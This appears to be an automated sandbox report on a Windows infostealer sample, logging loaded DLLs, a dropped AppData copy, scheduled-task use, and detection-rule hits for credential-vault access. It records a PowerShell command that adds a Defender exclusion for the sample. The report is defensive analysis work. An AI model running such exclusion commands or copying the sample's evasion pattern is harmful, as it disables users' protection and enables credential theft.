Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Section loaded: msasn1.dll

Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.400e8f0.10.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 10.2.lnYkIr.exe.441fa30.11.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 14.2.lnYkIr.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.4049f10.11.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 10.2.lnYkIr.exe.445b050.12.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 10.2.lnYkIr.exe.445b050.12.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 10.2.lnYkIr.exe.441fa30.11.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.400e8f0.10.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.4049f10.11.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers

Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: lnYkIr.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.400e8f0.10.raw.unpack, Lds5plxAPDj.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.400e8f0.10.raw.unpack, LZYJybC.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.400e8f0.10.raw.unpack, wDxPSW1p.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.400e8f0.10.raw.unpack, E0w8WLnyggK.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.400e8f0.10.raw.unpack, ZBSJHga2buE.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.400e8f0.10.raw.unpack, M4oIYVa.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.400e8f0.10.raw.unpack, kSS2HMsB8.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.400e8f0.10.raw.unpack, kSS2HMsB8.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, B54uhvmGLlyX4pN6ow.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, AfUbALyC500FynBqvI.cs	Security API names: _0020.SetAccessControl
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, AfUbALyC500FynBqvI.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, AfUbALyC500FynBqvI.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.413bc50.9.raw.unpack, B54uhvmGLlyX4pN6ow.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, AfUbALyC500FynBqvI.cs	Security API names: _0020.SetAccessControl
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, AfUbALyC500FynBqvI.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe.7130000.14.raw.unpack, AfUbALyC500FynBqvI.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@19/15@2/2

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe

File created: C:\Users\user\AppData\Roaming\lnYkIr.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1084:120:WilError_03
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Mutant created: \Sessions\1\BaseNamedObjects\UlgJvs
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7664:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3620:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5084:120:WilError_03

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe

File created: C:\Users\user\AppData\Local\Temp\tmp9C71.tmp

Jump to behavior

Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe

ReversingLabs: Detection: 28%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe

File read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe
